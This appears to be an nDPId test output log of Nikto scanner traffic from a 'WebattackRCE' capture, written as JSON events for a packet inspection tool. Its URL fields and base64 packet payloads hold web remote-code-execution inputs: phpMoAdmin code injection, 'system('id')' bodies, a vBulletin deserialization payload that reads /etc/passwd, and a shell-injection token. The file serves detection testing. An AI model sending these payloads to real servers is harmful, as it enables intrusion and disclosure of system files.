+01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":777,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277981,"flow_last_seen":1576420277981,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277981,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00874{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_packet_id":1,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":362,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":362,"pkt_l4_len":328,"thread_ts_msec":1576420277983,"pkt":"AAAAAAAAAAAAAAAACABFAAFcKzdAAEAGEGN\/AAABfwAAAcfcH5CIchJjnARiwIAYAED\/UAAAAQEICp1nAAedZwAHR0VUIC9tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} +01122{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":778,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277983,"flow_last_seen":1576420277983,"flow_idle_time":7560000,"flow_min_l4_payload_len":296,"flow_max_l4_payload_len":296,"flow_tot_l4_payload_len":296,"flow_avg_l4_payload_len":296,"midstream":1,"thread_ts_msec":1576420277983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 
(Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00878{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_packet_id":1,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277984,"pkt":"AAAAAAAAAAAAAAAACABFAAFfNJZAAEAGBwF\/AAABfwAAAcfeH5DptA3NjIJEK4AYAED\/UwAAAQEICp1nAAidZwAIR0VUIC93dS1tb2FkbWluLnBocD9jb2xsZWN0aW9uPXNlY3B1bHNlJmFjdGlvbj1saXN0Um93cyZmaW5kPWFycmF5KCk7cGhwaW5mbygpO2V4aXQ7IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDExKQ0KQ29udGVudC1MZW5ndGg6IDIyDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCm9iamVjdD0xO3N5c3RlbSgnaWQnKTs="} 
+01125{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":779,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277984,"flow_last_seen":1576420277984,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277984,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_packet_id":1,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277986,"pkt":"AAAAAAAAAAAAAAAACABFAAFn4zdAAEAGWFd\/AAABfwAAAcfgH5C+u9puvhX1U4AYAED\/WwAAAQEICp1nAAqdZwAKR0VUIC9waHBtb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":780,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277986,"flow_last_seen":1576420277986,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_packet_id":1,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277988,"pkt":"AAAAAAAAAAAAAAAACABFAAFqP5xAAEAG++9\/AAABfwAAAcfiH5DrbgbETTZEsIAYAED\/XgAAAQEICp1nAAudZwALR0VUIC9waHBtb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcwMTEpDQpDb250ZW50LUxlbmd0aDogMjINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpIb3N0OiAxMjcuMC4wLjENCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":781,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277988,"flow_last_seen":1576420277988,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277988,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmoadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_packet_id":1,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277989,"pkt":"AAAAAAAAAAAAAAAACABFAAFn5zlAAEAGVFV\/AAABfwAAAcfkH5BgZN5vdwnWyoAYAED\/WwAAAQEICp1nAA2dZwANR0VUIC93dS1tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb250ZW50LUxlbmd0aDogMjINCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":782,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":782,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277989,"flow_last_seen":1576420277989,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 
(Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_packet_id":1,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":376,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":376,"pkt_l4_len":342,"thread_ts_msec":1576420277991,"pkt":"AAAAAAAAAAAAAAAACABFAAFq2t9AAEAGYKx\/AAABfwAAAcfmH5C2ZOOFxq2Ns4AYAED\/XgAAAQEICp1nAA6dZwAOR0VUIC93dS1tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01137{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277991,"flow_last_seen":1576420277991,"flow_idle_time":7560000,"flow_min_l4_payload_len":310,"flow_max_l4_payload_len":310,"flow_tot_l4_payload_len":310,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1576420277991,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wu-moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_packet_id":1,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277992,"pkt":"AAAAAAAAAAAAAAAACABFAAFk9ANAAEAGR45\/AAABfwAAAcfoH5AH9M1coGd5OYAYAED\/WAAAAQEICp1nABCdZwAQR0VUIC9tb2FkbWluL21vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":784,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":784,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277992,"flow_last_seen":1576420277992,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) 
(Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00890{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_packet_id":1,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277993,"pkt":"AAAAAAAAAAAAAAAACABFAAFnZv1AAEAG1JF\/AAABfwAAAcfqH5D+xV+iBWcClIAYAED\/WwAAAQEICp1nABGdZwARR0VUIC9tb2FkbWluL3d1LW1vYWRtaW4ucGhwP2NvbGxlY3Rpb249c2VjcHVsc2UmYWN0aW9uPWxpc3RSb3dzJmZpbmQ9YXJyYXkoKTtwaHBpbmZvKCk7ZXhpdDsgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzAxMSkNCkNvbnRlbnQtTGVuZ3RoOiAyMg0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCg0Kb2JqZWN0PTE7c3lzdGVtKCdpZCcpOw=="} 
+01134{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":785,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":785,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277993,"flow_last_seen":1576420277993,"flow_idle_time":7560000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/moadmin\/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007011)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277997,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"flow_min_l4_payload_len":578,"flow_max_l4_payload_len":578,"flow_tot_l4_payload_len":578,"flow_avg_l4_payload_len":578,"midstream":1,"thread_ts_msec":1576420277997,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01249{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":786,"flow_packet_id":1,"flow_last_seen":1576420277997,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":644,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":644,"pkt_l4_len":610,"thread_ts_msec":1576420277997,"pkt":"AAAAAAAAAAAAAAAACABFAAJ2Zy1AAEAG01J\/AAABfwAAAcfuH5CyFV5xr3JzcYAYAEAAawAAAQEICp1nABWdZwAVR0VUIC92Yi9hamF4L2FwaS9ob29rL2RlY29kZUFyZ3VtZW50cz9hcmd1bWVudHM9TyUzQTEyJTNBJTIydkJfZEJfUmVzdWx0JTIyJTNBMiUzQSU3QnMlM0E1JTNBJTIyJTAwJTJBJTAwZGIlMjIlM0JPJTNBMTclM0ElMjJ2Ql9EYXRhYmFzZV9NeVNRTCUyMiUzQTElM0ElN0JzJTNBOSUzQSUyMmZ1bmN0aW9ucyUyMiUzQmElM0ExJTNBJTdCcyUzQTExJTNBJTIyZnJlZV9yZXN1bHQlMjIlM0JzJTNBNiUzQSUyMmFzc2VydCUyMiUzQiU3RCU3RHMlM0ExMiUzQSUyMiUwMCUyQSUwMHJlY29yZHNldCUyMiUzQnMlM0EyNSUzQSUyMnN5c3RlbSUyOCUyN2NhdCUyMCUyRmV0YyUyRnBhc3N3ZCUyNyUyOSUyMiUzQiU3RCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzA1OCkNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} 